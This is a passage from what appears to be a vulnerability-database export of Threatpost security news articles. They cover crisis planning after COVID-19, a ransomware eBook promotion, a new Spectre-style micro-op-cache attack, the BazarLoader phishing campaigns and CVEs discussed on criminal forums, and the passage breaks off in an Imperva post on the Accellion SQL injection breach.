"THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "href": "https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-21T15:41:00", "description": "Few could have anticipated the impact COVID-19 has had on business. It spread from an isolated outbreak to a global pandemic seemingly overnight, and IT leaders across the planet have had mixed success adjusting to the changes and uncertainty it has brought.\n\nWhile COVID-19 caught many businesses off guard, smart executives are already thinking about the next global crisis and what challenges it might present for IT security.\n\n## **Climate Change: A Looming Crisis**\n\nIt\u2019s a good bet that climate change could bring forth the sequel to COVID-19. [Global climate change is once again the top threat globally according to Pew Research](<https://www.pewresearch.org/global/2019/02/10/climate-change-still-seen-as-the-top-global-threat-but-cyberattacks-a-rising-concern/>) (not surprisingly, cyberattacks are a close second), and it typically occupies top rankings on similar doomsday lists. The World Economic Forum did not include pandemic or contagious disease on its 2019 list of Top 10 Global Risks By Likelihood, but [climate change dominated the top three](<https://www.weforum.org/reports/the-global-risks-report-2020>) \u2014 extreme weather events, failure of climate-change mitigation and adaptation, and major natural disasters like earthquakes or volcanoes.\n\nClimate change is particularly problematic for IT because it affects confidentiality, integrity and availability \u2014 the three pillars of information security \u2014 and requires a holistic strategy.\n\nAvailability is threatened by the physical nature of climate change that forces people away from home or office and the spiraling demand for resources. Confidentiality and integrity become problematic when considering the newest technologies that organizations are implementing as part of digital transformation. Security concerns should be a leading factor when considering and deploying new technology solutions.\n\n## **Pandemic Provides Sound Guidance for the Next Crisis**\n\nWe\u2019re all still learning the lessons of COVID-19, and going forward they must be held closely, as many potential climate-change outcomes could mirror what we\u2019ve experienced since March 2020. Wildfires or flooding from supersized or rare storms, [events that have intensified in recent years](<https://www.cnet.com/how-to/deadly-fires-hurricanes-floods-heres-why-the-situation-is-getting-worse/>), would bring mass evacuations and services disruptions that drive employees to work from home and businesses to establish secure connections in order to maintain productivity.\n\nWorking from home and increased cloud adoption pose challenges and risks that must be faced proactively. Since fixed locations and the legacy hardware they\u2019re connected to are increasingly vulnerable, a user-centric approach to security infrastructure, like a software-defined network, is required.\n\nThere is increasing chatter around the importance of data backup in 2021, and how automated backup and disaster recovery (BDR) will be an emerging mission-critical component of data security. Considering how working from home figures to continue driving the emergence of both multi-cloud and disaster recovery as-a-service (DRaaS) ([expected to grow at 41.6 percent CAGR through 2027](<https://www.xaasjournal.com/4-bdr-trends-for-2021/>)), it\u2019s safe to say most organizations will be focused on BDR.\n\n## **Expect the Worst Intentions of Bad Actors**\n\nSimilarly, COVID-19 has given us a window into how hackers can exploit human vulnerabilities during a crisis, with [healthcare and pandemic-related attacks prevalent in 2020](<https://threatpost.com/covid-19-vaccine-cyberattacks-credentials-zebrocy/162072/>). For example, phishing emails are designed to play on emotions, so it\u2019s not surprising that the words COVID, CORONAVIRUS, masks, test, quarantine, and vaccine [appeared widely in phishing emails](<https://threatpost.com/covid-19-vaccine-spear-phishing-attacks/164489/>) this year.\n\nA climate change-related crisis with widespread disruptions would likely provide bad actors similarly ideal conditions for deception. During the first weeks of shelter-in-place for many U.S. states last March, [almost three times as many people clicked on a phishing link and provided their credentials](<https://www.intelligentciso.com/2020/09/10/what-impact-has-covd-19-had-on-the-data-breach-landscape/>) to a simulated login page than in pre-COVID-19 phishing simulations conducted the previous year. Taking advantage of this heightened emotional response is how opportunistic hackers succeed.\n\nThis tells us that zero-trust identity and managed security solutions, can help organizations be ready for any situation that would test their workers\u2019 vulnerabilities. The added layer of employee training and awareness could include [proven methods of phishing prevention](<https://insights.sei.cmu.edu/insider-threat/2020/01/anti-phishing-training-is-it-working-is-it-worth-it.html>) that can dramatically reduce user click rates.\n\n## **Infrastructure Will Force Companies to Look Inward**\n\nThe internet and climate change are intertwined in an anxiety-producing plot \u2014 the internet is at once a cause of climate change and one of its potential casualties.\n\nInternet-of-things (IoT) devices, which are still largely unregulated, continue to see widespread adoption, and companies are now coming online with IoT-enabled smart factories and offices running entirely on automation. Existing operational technology (OT) networks that run most of our critical infrastructure are old and difficult to truly secure, so any disruption to the internet brought by climate change, or any related cyberattacks, must be accounted for in security planning. With IoT specifically, endpoint security must be addressed.\n\nIt\u2019s difficult to envision any company\u2019s plan that does not seriously take into account its own environmental footprint. Increasingly, governments are applying more stringent standards for energy efficiency around data centers, storage and networking. This kind of effort ultimately requires global, industry-wide and company-wide cooperation, and organizations who buy in first will position themselves for success in the face of adversity.\n\n## **True Resiliency Requires Vendor Independence**\n\nA climate change-related crisis would likely impact an organization\u2019s systems in some way. That company\u2019s vendors would be similarly impacted and possibly unable to provide service. More than anything, climate change will require companies to improve independency so they are not so reliant on existing legacy technology or other service providers for data, security or infrastructure.\n\nCompanies must meaningfully invest in disaster recovery and business continuity, and comprehensively assess all third-party risks in order to ensure independency. This effort also requires investment in new, scalable and integrated platforms to replace legacy architecture.\n\nIt might be impossible to plan for the next global crisis. But if COVID-19 has taught us anything, it\u2019s that transformative change is possible even in the most trying circumstances. Taking threats like these seriously and making a plan is the first step to ensuring resiliency when the world changes on a dime.\n\n**_Sivan Tehila is cybersecurity strategist at Perimeter 81 and an adjunct professor of cybersecurity at Yeshiva University._**\n\n_**Enjoy additional insights from Threatpost\u2019s InfoSec Insider community by **_[**_visiting our microsite_**](<https://threatpost.com/microsite/infosec-insiders-community/>)_**.**_\n", "cvss3": {}, "published": "2021-04-19T15:27:38", "type": "threatpost", "title": "What COVID-19 Taught Us: Prepping Cybersecurity for the Next Crisis", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-19T15:27:38", "id": "THREATPOST:16A4E4FD8C0D84305D5ABABEBBC6343E", "href": "https://threatpost.com/covid-19-prepping-cybersecurity-crisis/165472/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-21T15:41:03", "description": "Ransomware has been a growing scourge for years, but recent attacks illustrate a growing sophistication by attackers within this slice of the cybercrime underbelly. Snowballing assaults against the business sector, schools and government organizations are now a primary cybersecurity concern. Making matters worse, is the ever-changing nature of ransomware attacks, complicating the cyber-defender\u2019s job.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nFor instance, the last 12 months has seen emerging types of extortion attempts on the part of ransomware operators. [Double-extortion efforts](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) pioneered by cyberattack groups like Maze have become standard operating procedure (stealing sensitive data and threatening to release it if a victim doesn\u2019t pay up). But beyond this, some ransomware operators, such as the [SunCrypt gang](<https://threatpost.com/revil-video-game-hit-revenue/160743/>), are mounting follow-on denial-of-service (DoS) attacks to put the screws to victims. And, other gangs are using the data they steal to mount additional attacks on the initial victim\u2019s partners or suppliers, as seen in the [Blackbaud attack](<https://gurucul.com/news/making-sense-of-the-blackbaud-ransomware-attack>).\n\nThere\u2019s also a burgeoning move [to attack cloud resources](<https://threatpost.com/cybercrime-cloud-accelerate-attacks-data-glut/161243/>) such as Kubernetes and Docker, which opens up a new threat surface and area of risk for IT security teams.\n\nKeeping up with ransomware changes can be overwhelming. To that end, Threatpost hopes to lend context, in-depth insights and mitigation examples with a fresh eBook to arm infosec professionals with knowledge needed to defend against not only the state of play \u2013 but also the emerging trends and attack patterns (such as those above) that are set to bubble up and take security staff by surprise in the year ahead.\n\nIn \u201c2021: The Evolution of Ransomware,\u201d a [free, downloadable PDF eBook](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>), a series of in-depth feature articles explores this multifaceted threat and what\u2019s next. It kicks off with our lead story that goes beyond the ransomware status quo, and explores top emerging trends and granular insights like how ransomware code itself is changing.\n\n**_Inside This eBook:_**\n\n * Emerging Trends in Ransomware\n * A Peek Inside the Ransomware Economy\n * Cyber-Insurance Fuels Ransomware Payment Surge\n * Threatpost Poll: The Cost of a Ransomware Attack\n * Diary of a 48-Hour Ransomware Attack\n * A Practical Guide to Avoiding Ransomware\n\nWe also take a deep dive into how the [ransomware underground economy](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>) is structured and what goes on in illicit forums. Threatpost follows the money to find out how these affiliates work with ransomware operators, their code of conduct and more.\n\nInside this eBook, Threatpost also delivers an insider\u2019s view into the real-world toll that ransomware can take. An exclusive case study takes readers inside a fascinating incident-response event, with a diary of the first 48 hours of an attack on a [school district](<https://threatpost.com/pysa-ransomware-education-feds-warn/164832/>).\n\nOther articles include exclusive Threatpost research (based on [a reader poll](<https://threatpost.com/threatpost-poll-ransomware-security/162842/>)) that examines attitudes towards paying the ransom, how respondents said they deal with a ransomware attack and what organizations\u2019 top challenges are. We also take a critical look at the [role of cyberinsurance companies](<https://threatpost.com/mixed-sanctions-ransomware-negotiators/159795/>) when it comes to ransomware. Lastly, Threatpost offers a round-up of best practices for mitigating risk with an at-a-glance checklist for shoring up defenses.\n\nThreatpost is releasing this eBook at a time of unprecedented growth for this type of cyberattack. The number of ransomware attacks has jumped by 350 percent since 2018, the average ransom payment increased by more than 100 percent in 2020, downtime is up by 200 percent and the average cost per incident is on the rise, according to a [recent report](<https://purplesec.us/resources/cyber-security-statistics/ransomware/>) from PurpleSec.\n\nWorryingly, in a recent survey from Proofpoint, 75 percent of respondents said they have experienced a ransomware attack; victims also reported that ransom demand amounts [are up 320 percent](<https://threatpost.com/ransomware-demands-spike-payments-rise/163744/>) so far this year compared to 2020.\n\nBusinesses need to view ransomware as a future event to plan for, not a hypothetical abstract. Cloud services, remote workers and a reliance on connected devices [put any business at risk](<https://threatpost.com/ransomware-cheese-shortages-netherlands/165407/>) for a ransomware incident.\n\nThe polymorphic nature of ransomware crimes plays out in multiple dimensions, and paying attention to those developing trends is vital. [Download this free Threatpost eBook today](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>), to help hone a solid foundation for understanding this threat, and how to be better positioned to defend against it \u2013 both now and in the future.\n\n**Download our exclusive ****FREE Threatpost Insider eBook****,** _**\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d**_** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and ****[DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now**** \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-19T18:01:23", "type": "threatpost", "title": "Ransomware: A Deep Dive into 2021 Emerging Cyber-Risks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-19T18:01:23", "id": "THREATPOST:F084C5D91E4F66092F5449922C34C4CE", "href": "https://threatpost.com/ebook-2021-ransomware-emerging-risks/165477/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-05-05T13:59:21", "description": "All defenses against Spectre side-channel attacks can now be considered broken, leaving billions of computers and other devices just as vulnerable today as they were when the hardware flaw was [first announced](<https://threatpost.com/intel-halts-spectre-meltdown-patching-for-broadwell-and-haswell-systems/129615/>) three years ago.\n\nA [paper](<http://www.cs.virginia.edu/~av6ds/papers/isca2021a.pdf>) published on Friday by a team of computer scientists from the University of Virginia and the University of California, San Diego, describes how all modern AMD and Intel chips with micro-op caches are vulnerable to this new line of attack, given that it breaks all defenses. That includes all Intel chips that have been manufactured since 2011, which all contain micro-op caches.\n\nThe vulnerability in question is called Spectre because it\u2019s built into modern processors that perform branch prediction. It\u2019s a technique that makes modern chips as speedy as they are by performing what\u2019s called \u201cspeculative execution,\u201d where the processor predicts instructions it might end up executing and prepares by following the predicted path to pull the instructions out of memory. If the processor stumbles down the wrong path, the technique can leave traces that may make private data detectable to attackers. One example is when data accesses memory: if the speculative execution relies on private data, the data cache gets turned into a side channel that can be squeezed for the private data through use of a [timing attack](<https://threatpost.com/intel-side-channel-attack-data/164582/>). \n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe new line of attacks exploits the micro-op cache: an on-chip structure that speeds up computing by storing simple commands and allowing the processor to fetch them quickly and early in the speculative execution process, as the team explains in a [writeup](<https://engineering.virginia.edu/news/2021/04/defenseless-uva-engineering-computer-scientists-discover-vulnerability-affecting>) from the University of Virginia. Even though the processor quickly realizes its mistake and does a U-turn to go down the right path, attackers can get at the private data while the processor is still heading in the wrong direction. \n\nOm Moolchandani, co-founder, CTO, CISO and research team leader at Accurics, said that this is going to be a widespread problem. \u201cAny x86 type multi-core processor could be affected: essentially all modern 32- and 64-bit PC processors and the vast majority of typical server hardware,\u201d he told Threatpost in an email on Monday. Non-x86 processors such as ARM, MIPS, and RISC V, etc. aren\u2019t expected to be affected.\n\n## **Back to the Drawing Board**\n\nThe findings are going to obliterate a pile of work done by those who\u2019ve been working hard to fix Spectre, the team says. \u201cSince Spectre was discovered, the world\u2019s most talented computer scientists from industry and academia have worked on software patches and hardware defenses, confident they\u2019ve been able to protect the most vulnerable points in the speculative execution process without slowing down computing speeds too much. They will have to go back to the drawing board,\u201d according to UVA\u2019s writeup. \n\nThe new lines of attack demolish current defenses because they only protect the processor in a later stage of speculative execution. The team was led by UVA Engineering Assistant Professor of Computer Science Ashish Venkat, who picked apart Intel\u2019s suggested defense against Spectre, which is called [LFENCE](<https://software.intel.com/security-software-guidance/best-practices/optimized-mitigation-approach-load-value-injection>). That defense tucks sensitive code into a waiting area until the security checks are executed, and only then is the sensitive code allowed to execute, he explained. \u201cBut it turns out the walls of this waiting area have ears, which our attack exploits. We show how an attacker can smuggle secrets through the micro-op cache by using it as a covert channel.\u201d\n\n## **Kiss That Precious Performance Goodbye**\n\nVenkat says we can think about the potential attacks as being something like \u201ca hypothetical airport security scenario where TSA lets you in without checking your boarding pass because (1) it is fast and efficient, and (2) you will be checked for your boarding pass at the gate anyway. \n\n\u201cA computer processor does something similar. It predicts that the check will pass and could let instructions into the pipeline. Ultimately, if the prediction is incorrect, it will throw those instructions out of the pipeline, but this might be too late because those instructions could leave side-effects while waiting in the pipeline that an attacker could later exploit to infer secrets such as a password,\u201d Venkat said. \n\nAccording to team member UVA Ph.D. student Logan Moody, the new attacks are going to pour cement shoes onto the feet of modern chips. \u201cIn the case of the previous Spectre attacks, developers have come up with a relatively easy way to prevent any sort of attack without a major performance penalty for computing,\u201d Moody said. \u201cThe difference with this attack is you take a much greater performance penalty than those previous attacks.\u201d\n\nMoolchandani described the performance drag like this: \u201cThe affected parts of the computer focus specifically on improving performance by reading information from relatively slow components such as external memory in anticipation of what will be needed. This so-called speculative execution cache greatly improves performance by ensuring that data is available when it\u2019s needed, similar to the effect of an assembly line in manufacturing. The vulnerability is in the mechanics of how that assembly line works, and any patch will necessarily affect the efficiency of that process. We intuitively know it will reduce performance, and any performance impact will be magnified because it is buried so deep in the inner workings of the processor.\u201d\n\n## **How Likely Are Attacks?**\n\nMoolchandani told Threatpost that as far as the direct impact of attacks on organizations, end-users and consumers go, the worry will concern attackers\u2019 ability to dig secrets out of the nooks and crannies of processors \u201cIt would be very difficult to create a focused attack looking for specific information,\u201d he said in an email. \u201cInstead, attacks are expected to take the form of passive surveillance, collecting random information. That information is collected from deep inside the processor, though, and could contain anything processed by the computer.\u201d \n\nGiven the structure of chips and this newly discovered flaw, even encryption won\u2019t save our data, he said.\n\n\u201cBecause of the way it\u2019s gathered, encrypted information is not safe from attacks \u2013 it can be collected by criminals after decryption has taken place,\u201d Moolchandani said. \u201cThey could even access arbitrary data stored on the hard drive which hasn\u2019t been accessed in a very long time. While they cannot control what information they might be able to see, attackers can still target specific organizations or domains to increase the chance of finding interesting information, for example, large e-commerce sites which process payment data, or government-aligned organizations which might process classified information, etc.\u201d\n\nThe research team reported their findings to international chip makers in April and plan to present at the International Symposium on Computer Architecturem, [ISCA](<https://iscaconf.org/isca2021/>), which will be held virtually in June.\n\n5/3/21 16:11 UPDATE 1: Intel emailed the following statement to Threatpost: \u201cIntel reviewed the report and informed researchers that existing mitigations were not being bypassed and that this scenario is addressed in our [secure coding guidance](<https://software.intel.com/security-software-guidance/secure-coding/guidelines-mitigating-timing-side-channels-against-cryptographic-implementations>). Software following our guidance already have protections against incidental channels including the uop cache incidental channel. No new mitigations or guidance are needed.\u201d\n\n5/3/21 22:47 UPDATE 2: Expect this to be a heated, if virtual, debate at ISCA. After Intel sent out its statement, UVA\u2019s Venkat responded with this emailed response: \u201cWe\u2019re aware of these guidelines from Intel suggesting that software developers \u2026 write code in a way that is not vulnerable to side-channel attacks. Here\u2019s an excerpt from the Intel article: \u2018Developers who wish to protect secret data against timing side-channel methods should ensure that their code runtime, data access patterns, and code access patterns are identical independent of secret values.\u2019\n\n\u201cCertainly, we agree that software needs to be more secure, and we agree as a community that constant-time programming is an effective means to writing code that is invulnerable to side-channel attacks. However, the vulnerability we uncover is in hardware, and it is important to also design processors that are secure and resilient against these attacks.\n\n\u201cIn addition, constant-time programming is not only hard in terms of the actual programmer effort, but also entails high performance overhead and significant deployment challenges related to patching all sensitive software. The percentage of code that is written using Constant Time principles is in fact quite small. Relying on this would be dangerous. That is why we still need to secure the hardware.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook, _\u201c_[_2021: The Evolution of Ransomware_](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)_,\u201d_ to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and[ DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-05-03T20:56:03", "type": "threatpost", "title": "New Attacks Slaughter All Spectre Defenses", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-03T20:56:03", "id": "THREATPOST:905F5C5FE38CC3228FF94F798221B3D5", "href": "https://threatpost.com/attacks-slaughter-spectre-defenses/165809/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-21T15:43:53", "description": "The BazarLoader malware is leveraging worker trust in collaboration tools like Slack and BaseCamp, in email messages with links to malware payloads, researchers said.\n\nAnd in a secondary campaign aimed at consumers, the attackers have added a voice-call element to the attack chain.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe [BazarLoader downloader](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>), written in C++, has the primary function of downloading and executing additional modules. BazarLoader was first observed in the wild last April \u2013 and since then researchers have observed at least six variants, \u201csignaling active and continued development.\u201d\n\nIt\u2019s been recently seen being used as a staging malware for ransomware, [particularly Ryuk](<https://threatpost.com/ransomware-french-it-giant/160484/>).\n\n\u201cWith a focus on targets in large enterprises, BazarLoader could potentially be used to mount a subsequent ransomware attack,\u201d according to an advisory from Sophos, [issued on Thursday](<https://news.sophos.com/en-us/2021/04/15/bazarloader/>).\n\n## **Cyberattackers Abuse Slack and BaseCamp **\n\nAccording to researchers at Sophos, in the first campaign spotted, adversaries are targeting employees of large organizations with emails that purport to offer important information related to contracts, customer service, invoices or payroll.\n\n\u201cOne spam sample even attempted to disguise itself as a notification that the employee had been laid off from their job,\u201d according to Sophos.\n\nThe links inside the emails are hosted on Slack or BaseCamp cloud storage, meaning that they could appear to be legitimate if a target works at an organization that uses one of those platforms. In an [era of remote working](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>), those odds are good that this is the case.\n\n\u201cThe attackers prominently displayed the URL pointing to one of these well-known legitimate websites in the body of the document, lending it a veneer of credibility,\u201d researchers said. \u201cThe URL might then be further obfuscated through the use of a URL shortening service, to make it less obvious the link points to a file with an .EXE extension.\u201d\n\nIf a target clicks on the link, BazarLoader downloads and executes on the victim\u2019s machine. The links typically point directly to a digitally signed executable with an Adobe PDF graphic as its icon. The files usually perpetuate the ruse, with names like presentation-document.exe, preview-document-[number].exe or annualreport.exe, researchers noted.\n\nThese executable files, when run, inject a DLL payload into a legitimate process, such as the Windows command shell, cmd.exe.\n\n\u201cThe malware, only running in memory, cannot be detected by an endpoint protection tool\u2019s scans of the filesystem, as it never gets written to the filesystem,\u201d explained researchers. \u201cThe files themselves don\u2019t even use a legitimate .DLL file suffix because Windows doesn\u2019t seem to care that they have one; The OS runs the files regardless.\u201d\n\n## **\u2018BazarCall\u2019 Campaign**\n\nIn the second campaign, Sophos found that the spam messages are devoid of anything suspicious: There\u2019s no personal information of any kind included in the body of the email, no link and no file attachment.\n\n\u201cAll the message claims is that a free trial for an online service the recipient purportedly is currently using will expire in the following day or two, and embeds a telephone number the recipient needs to call in order to opt-out of an expensive, paid renewal,\u201d researchers explained.\n\nIf a target decides to pick up the phone, a friendly person on the other side gives them a website address where the soon-to-be-victim could supposedly unsubscribe from the service.\n\n\u201cThe well-designed and professional looking websites bury an unsubscribe button in a page of frequently asked questions,\u201d according to Sophos. \u201cClicking that button delivers a malicious Office document (either a Word doc or an Excel spreadsheet) that, when opened, infects the computer with the same BazarLoader malware.\u201d\n\nThe messages initially claimed to originate from a company called Medical Reminder Service, and include a telephone number in the message body, as well as a street address for a real office building located in Los Angeles. But in mid-April, the messages adopted a lure involving a fake paid online lending library, called BookPoint.\n\nThe subject lines revolving around BookPoint also reference a long number or code, which users are asked to input in order to \u201cunsubscribe.\u201d\n\nIn terms of the infection routine, the attackers in these so-called \u201cBazarCall\u201d campaigns deliver weaponized Microsoft Office documents that invoke commands to drop and execute one or more payload DLLs.\n\n## **Connection to Trickbot?**\n\nResearchers have been suspecting that BazarLoader could be related or authored by the TrickBot operators. TrickBot is another first-stage loader malware often used in ransomware campaigns.\n\nSophos looked into the connection and found that the two malwares use some of the same infrastructure for command and control.\n\n\u201cFrom what we could tell, the [BazarLoader] malware binaries running in the lab network bear no resemblance to TrickBot,\u201d according to the posting. \u201cBut they did communicate with an IP address that has been used in common, historically, by both malware families. Of course, a lot of people have [studied this connection in the past](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>).\u201d\n\nIn any event, BazarLoader appears to be in an early stage of development and isn\u2019t as sophisticated as more mature families like TrickBot, researchers added.\n\nFor instance, \u201cwhile early versions of the malware were not obfuscated, more recent samples appear to encrypt the strings that might reveal the malware\u2019s intended use,\u201d they said.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T20:27:25", "type": "threatpost", "title": "BazarLoader Malware Abuses Slack, BaseCamp Clouds", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-16T20:27:25", "id": "THREATPOST:354BF51EC880C48C85D9302EDB1227D6", "href": "https://threatpost.com/bazarloader-malware-slack-basecamp/165455/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offer critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d[](<https://threatpost.com/newsletter-sign/>)The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed about vulnerabilities among attackers between Jan. 2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. Patching ZeroLogon was so slow, Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained varying CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because there wasn\u2019t a clear frontrunning CVE discussed.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2021-03-09T20:27:10", "description": "At the end of last year, enterprise firewall company Accellion was the victim of a two-phase [SQL injection attack](<https://www.imperva.com/learn/application-security/sql-injection-sqli/>) that resulted in significant sensitive data breaches over the last number of months. This attack is important for several reasons. It underscores the [rise in frequency](<https://www.identityforce.com/blog/2020-data-breaches>) of incidents leading to public breaches, and highlights SQL injections as an increasingly popular way for attackers to cause major damage. Imperva Research Labs are consistently seeing SQL injection as a [preferred attack](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) method. More importantly (and frankly, what should scare the pants off everyone), the analysis of this breach confirms that attackers and their methods are becoming more creative and sophisticated. To stop them, organizations need to put greater effort into analyzing and monitoring the data layer. When organizations combine data-centric threat mitigation with protecting all paths to their data, they have a far better posture to stop sophisticated breaches like this in their tracks.\n\n### Learning from the timeline of events\n\nLet\u2019s take a closer look at the details of this attack and explain why understanding how it happened is critical to stopping similar attacks in the 